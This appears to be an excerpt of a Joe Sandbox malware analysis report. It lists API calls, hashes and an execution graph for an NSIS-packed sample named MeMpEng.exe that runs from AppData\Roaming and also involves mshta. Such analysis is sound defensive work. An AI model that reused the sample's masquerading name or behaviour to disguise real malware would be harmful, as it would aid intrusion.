                                                          • Instruction Fuzzy Hash: 6F11E77360423837DB10996D9C45E9E3298DF85374F254237FA66F31D1EA79DC2182E8
                                                          APIs
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(?), ref: 00405EDC
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EE1
                                                            • Part of subcall function 00405ECE: CharNextW.USER32(00000000), ref: 00405EF9
                                                          • lstrlenW.KERNEL32(007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ), ref: 00405F84
                                                          • GetFileAttributesW.KERNEL32(007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 00405F94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$P?z
                                                          • API String ID: 3248276644-105541177
                                                          • Opcode ID: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                          • Instruction ID: f4f6e0775867387827aab8404002f3e8856b431f62ec50d584846b16db6dccac
                                                          • Opcode Fuzzy Hash: bcbf200ecc0ebcd9a110e0aedcb8263399075ff3aca88ce7f3d60eb64f48f27a
                                                          • Instruction Fuzzy Hash: 9BF02D36105E5319D62273365C09AAF1544CF86358709057BF852B12D5CF3C8A53CC7E
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405E29
                                                          • CharPrevW.USER32(?,00000000), ref: 00405E33
                                                          • lstrcatW.KERNEL32 ref: 00405E45
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E23
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-4017390910
                                                          • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction ID: d63f260b1a4b66e3edf6d37d75e222a08c60d96d58f132ba82df153afabc7d48
                                                          • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                          • Instruction Fuzzy Hash: EDD0A771101534BAC212AB54AC04CDF73ACAF46344342403BF541B30A5C77C5D5187FD
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 729F1171
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 729F11E3
                                                          • GlobalFree.KERNEL32 ref: 729F124A
                                                          • GlobalFree.KERNEL32(?), ref: 729F129B
                                                          • GlobalFree.KERNEL32(00000000), ref: 729F12B1
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.837153397.00000000729F1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 729F0000, based on PE: true
                                                          • Associated: 0000000B.00000002.837149162.00000000729F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837157292.00000000729F4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          • Associated: 0000000B.00000002.837161148.00000000729F6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_729f0000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: eec4ed17a59fbdf6c15fbf05aebc84a7b5db32dd7985eb954aa9799f6816d2ff
                                                          • Instruction ID: a14719333dc1925a3570485ffe165d97573da3834bc4c43e2aea789e08847ddb
                                                          • Opcode Fuzzy Hash: eec4ed17a59fbdf6c15fbf05aebc84a7b5db32dd7985eb954aa9799f6816d2ff
                                                          • Instruction Fuzzy Hash: 6C518F76544201EFD780CFADD844B657BB8FB04318B2C5929FA4ADB610E734DA10CF96
                                                          APIs
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll), ref: 004026BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsnB972.tmp$C:\Users\user\AppData\Local\Temp\nsnB972.tmp\System.dll
                                                          • API String ID: 1659193697-2414381874
                                                          • Opcode ID: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                                          • Instruction ID: 017f71272b68274a12e342b3970613002fe1d3414b89f7e2a3fd3533f9475010
                                                          • Opcode Fuzzy Hash: b8575b449f0ed2f2ae019e5d4e70b49293f3ca762bd0c00a65c0af1d038813a1
                                                          • Instruction Fuzzy Hash: C7110D72A10206BBCB00BBB19F46AAE7B616F51748F20843FF502F61D1DAFD8851631E
                                                          APIs
                                                          • DestroyWindow.USER32 ref: 00403051
                                                          • GetTickCount.KERNEL32(00000000,0040321C,00000001), ref: 0040306F
                                                          • CreateDialogParamW.USER32 ref: 0040308C
                                                          • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                          • Instruction ID: 04dff40eaa5975d4421a2039d3eb5be5080597dcfa90b8d0ab21d67e5ec7c10f
                                                          • Opcode Fuzzy Hash: 69c8c07bcb791fb785738829cd10c29190a6685c9026359a959baa5e0d41d55b
                                                          • Instruction Fuzzy Hash: BFF05430406621AFC6616F50FD08A9B7B69FB45B12B45843BF145F11E8C73C48818B9D
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 0040557C
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004055CD
                                                            • Part of subcall function 0040451F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404531
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                          • Instruction ID: 8cb385540c394feb6b7acedb458c1b163c7bd0e2eecbca803c6ec6ccc0281e24
                                                          • Opcode Fuzzy Hash: 1c6db2fb8bf2a941a381235c92e780c462a7a47fd759007b21bb5a8fe18e5fa5
                                                          • Instruction Fuzzy Hash: 68017C71101609FBEF205F11DD84A9B3A2BEBC4754F20403BFA05761D5D73A8D929E6D
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,7570D4C4,00000000,C:\Users\user\AppData\Local\Temp\,00403B69,00403A7F,?,?,00000008,0000000A,0000000C), ref: 00403BAB
                                                          • GlobalFree.KERNEL32(0095C740), ref: 00403BB2
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B91
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-4017390910
                                                          • Opcode ID: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                          • Instruction ID: b7081a2a86391088548fef66407111aafa244a1a89fd4905b066b82f00895e7d
                                                          • Opcode Fuzzy Hash: 00efa9c9f1272b7cc7d931f24958e2d47b6ee42ce3838b547fcba19599468942
                                                          • Instruction Fuzzy Hash: 59E0C23340053057CB211F45ED04B1AB778AF95B26F09807BE940BB2618BBC2C438FC8
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Roaming,0040310E,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\MeMpEng.exe,C:\Users\user\AppData\Roaming\MeMpEng.exe,80000000,00000003), ref: 00405E75
                                                          • CharPrevW.USER32(80000000,00000000), ref: 00405E85
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00405E6F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 2709904686-2707566632
                                                          • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction ID: e625fb8110be14d05545ed3956eb9dcd351d24123ebbdb87cfc6543e98ba95a5
                                                          • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                          • Instruction Fuzzy Hash: 27D05EB3400920AAC312A704DD00DAF73A8EF523447464466F881A71A5D7785D8186EC
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB9
                                                          • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                                          • CharNextA.USER32(00000000), ref: 00405FE2
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEB
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.836017512.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.836011408.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836021847.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.000000000077C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000782000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000786000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.0000000000789000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007A5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007AB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007B3000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836026835.00000000007D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.836093298.00000000007D7000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_MeMpEng.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction ID: 0ddac3552a90187c63c7b8d1f8650bd486a880c4da7af56fddea67c471c8745b
                                                          • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                          • Instruction Fuzzy Hash: 5AF09631104515FFCB029FA5DE04D9FBBA8EF05350B2540B9F880F7250D678DE01ABA9
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000003.453321051.0000000003700000.00000010.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_3_3700000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 1cc3d4e639257d34061ce24eab2eea06267f023e27d399d35a1cb69ad6c0c155
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000003.453321051.0000000003700000.00000010.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_3_3700000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 1cc3d4e639257d34061ce24eab2eea06267f023e27d399d35a1cb69ad6c0c155
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000003.453321051.0000000003700000.00000010.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_3_3700000_mshta.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction ID: 1cc3d4e639257d34061ce24eab2eea06267f023e27d399d35a1cb69ad6c0c155
                                                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                          • Instruction Fuzzy Hash:

                                                          Execution Graph

                                                          Execution Coverage:21.9%
                                                          Dynamic/Decrypted Code Coverage:13.6%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:1593
                                                          Total number of Limit Nodes:44
                                                          execution_graph 4057 401bc0 4058 401c11 4057->4058 4059 401bcd 4057->4059 4060 401c16 4058->4060 4061 401c3b GlobalAlloc 4058->4061 4062 4023af 4059->4062 4065 401be4 4059->4065 4070 401c56 4060->4070 4096 406554 lstrcpynW 4060->4096 4076 406591 4061->4076 4064 406591 22 API calls 4062->4064 4067 4023bc 4064->4067 4094 406554 lstrcpynW 4065->4094 4067->4070 4097 405bb4 4067->4097 4069 401c28 GlobalFree 4069->4070 4072 401bf3 4095 406554 lstrcpynW 4072->4095 4074 401c02 4101 406554 lstrcpynW 4074->4101 4092 40659c 4076->4092 4077 4067e3 4078 4067fc 4077->4078 4124 406554 lstrcpynW 4077->4124 4078->4070 4080 4067b4 lstrlenW 4080->4092 4084 406591 15 API calls 4084->4080 4085 4066ad GetSystemDirectoryW 4085->4092 4086 4066c3 GetWindowsDirectoryW 4086->4092 4087 406591 15 API calls 4087->4092 4088 406755 lstrcatW 4088->4092 4090 4066f9 SHGetFolderPathW 4090->4092 4092->4077 4092->4080 4092->4084 4092->4085 4092->4086 4092->4087 4092->4088 4092->4090 4093 406725 SHGetPathFromIDListW CoTaskMemFree 4092->4093 4102 406422 4092->4102 4107 406948 GetModuleHandleA 4092->4107 4113 406802 4092->4113 4122 40649b wsprintfW 4092->4122 4123 406554 lstrcpynW 4092->4123 4093->4092 4094->4072 4095->4074 4096->4069 4098 405bc9 4097->4098 4099 405c15 4098->4099 4100 405bdd MessageBoxIndirectW 4098->4100 4099->4070 4100->4099 4101->4070 4125 4063c1 4102->4125 4105 406486 4105->4092 4106 406456 RegQueryValueExW RegCloseKey 4106->4105 4108 406964 4107->4108 4109 40696e GetProcAddress 4107->4109 4129 4068d8 GetSystemDirectoryW 4108->4129 4112 40697d 4109->4112 4111 40696a 4111->4109 4111->4112 4112->4092 4114 40680f 4113->4114 4116 406878 CharNextW 4114->4116 4119 406885 4114->4119 4120 406864 CharNextW 4114->4120 4121 406873 CharNextW 4114->4121 4132 405e50 4114->4132 4115 40688a CharPrevW 4115->4119 4116->4114 4116->4119 4117 4068ab 4117->4092 4119->4115 4119->4117 4120->4114 4121->4116 4122->4092 4123->4092 4124->4078 4126 4063d0 4125->4126 4127 4063d4 4126->4127 4128 4063d9 RegOpenKeyExW 4126->4128 4127->4105 4127->4106 4128->4127 4130 4068fa wsprintfW LoadLibraryExW 4129->4130 4130->4111 4133 405e56 4132->4133 4134 405e6c 4133->4134 4135 405e5d CharNextW 4133->4135 4134->4114 4135->4133 5168 404f40 GetDlgItem GetDlgItem 5169 404f92 7 API calls 5168->5169 5175 4051b7 5168->5175 5170 405039 DeleteObject 5169->5170 5171 40502c SendMessageW 5169->5171 5172 405042 5170->5172 5171->5170 5174 405079 5172->5174 5176 406591 22 API calls 5172->5176 5173 405299 5178 405345 5173->5178 5187 4052f2 SendMessageW 5173->5187 5210 4051aa 5173->5210 5177 4044d3 23 API calls 5174->5177 5175->5173 5211 405226 5175->5211 5222 404e8e SendMessageW 5175->5222 5181 40505b SendMessageW SendMessageW 5176->5181 5182 40508d 5177->5182 5179 405357 5178->5179 5180 40534f SendMessageW 5178->5180 5189 405370 5179->5189 5190 405369 ImageList_Destroy 5179->5190 5198 405380 5179->5198 5180->5179 5181->5172 5186 4044d3 23 API calls 5182->5186 5183 40528b SendMessageW 5183->5173 5184 40453a 8 API calls 5188 405546 5184->5188 5201 40509e 5186->5201 5192 405307 SendMessageW 5187->5192 5187->5210 5193 405379 GlobalFree 5189->5193 5189->5198 5190->5189 5191 4054fa 5196 40550c ShowWindow GetDlgItem ShowWindow 5191->5196 5191->5210 5195 40531a 5192->5195 5193->5198 5194 405179 GetWindowLongW SetWindowLongW 5197 405192 5194->5197 5203 40532b SendMessageW 5195->5203 5196->5210 5199 405197 ShowWindow 5197->5199 5200 4051af 5197->5200 5198->5191 5213 4053bb 5198->5213 5227 404f0e 5198->5227 5220 404508 SendMessageW 5199->5220 5221 404508 SendMessageW 